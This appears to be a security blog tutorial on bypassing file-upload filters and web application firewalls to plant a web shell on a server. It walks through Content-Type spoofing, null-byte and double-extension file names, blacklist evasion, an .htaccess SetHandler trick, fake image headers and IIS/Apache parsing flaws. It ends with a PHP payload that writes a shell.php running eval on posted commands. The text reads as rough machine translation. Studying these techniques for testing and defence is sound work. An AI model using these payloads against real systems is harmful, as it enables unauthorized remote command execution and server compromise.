Some technique to bypass waf for uploading Shell on webserver

by do son · Published · Updated

File upload vulnerability is when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, and sometimes almost no technical barriers.

Upload detection mechanism

Client javascript detection

  • The file extension is usually detected

Server MIME type detection

  • Content-Type content is usually detected

Server directory path detection

  • Usually with the path parameter related content

Server-side file extension detection

  • The content associated with the file extension is usually detected

Server-side file content detection

  • Detects whether a file’s content is legitimate or contains malicious code

File upload vulnerability exploit

Javascript client authentication

Create an allowable file type, which we need to write the code, capturing packets, blocking, modify the executable malicious code.

MIME type validation

Modify Content-Type directly: Allow MIME types

Modify the file named executable file, sometimes with the need to modify multipart/form-datasensitive

Common MIME types:

.html text/html   
 .xml text/xml
 .txt text/plain   
 .rtf application/rtf   
 .pdf application/pdf   
 .word application/msword   
 .png image/png   
 .gif image/gif   
 .jpeg,.jpg image/jpeg   
 .au audio/basic   
 mid,.midi audio/midi,audio/x-midi   
 .ra, .ram audio/x-pn-realaudio   
 .mpg,.mpeg video/mpeg   
 .avi video/x-msvideo   
 .gz application/x-gzip   
 .tar application/x-tar   
 application/octet-stream

https://www.youtube.com/watch?v=zL_8NouuAJ0

Null Byte and Double Extension Injection

Create a new one test.php%00.jpg or test.php.jpg

https://www.youtube.com/watch?v=3X1DB306TWM

File extension

Blacklist detection
  • File case is bypassed: For example, file names such as Asp and Php bypass blacklist detection
  • The list of lists is bypassed: The use of blacklist is not in the list of attacks, such as no blacklist asa, cer, php3, php5 like
  • Special file names are bypassed: Modify the file named test.asp. Or test.asp_ (underlined), bypass authentication, the windows will automatically remove the points and spaces, linux and unix does not support
Double extension bypass

Apache analytic from the forward, so if you upload a test.php.123, do not know the .123 file, it will forward to resolve until the encounter can be resolved

https://www.youtube.com/watch?v=SHxV_bx8QwY

.htaccess file attack

With the list of lists to bypass, upload a custom. Htaccess file, you can easily bypass the various tests

Create a .htaccess file
<filesmatch “test”=””>
SetHandler application / x-httpd-php

Then upload a file containing the test string, no extension which you can write a sentence

File content detection bypassed

File header detection

jpg-JFIF-FF D8 FF EO 00 10 4A 46 49 46
gif-GIF89a-47 49 46 38 39 61
png-PNG-89 50 4E 47
In the file header followed by malicious code on the line

File related information detection
File load detection
Insert a malicious code in the file comment

Parsing exploits

The Apache extension order parsing vulnerability

Named test.php.xxx (php3 integrated environment will be analyzed in accordance with php)

IIS asp analysis loopholes

IIS6.0

1.test.asp;.jpg
2.test.asp/123.jpg
3.test.asa,test.cer.test.cdx

IIS7.5 / 7.0

In the default Fast-CGI open, upload a name for the test.jpg, the content is
<?PHP fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[cmd])?>’);?>

https://www.youtube.com/watch?v=vZDICqbtfP4

Tags: php webshellvulnVulnerabilityweb appwebshell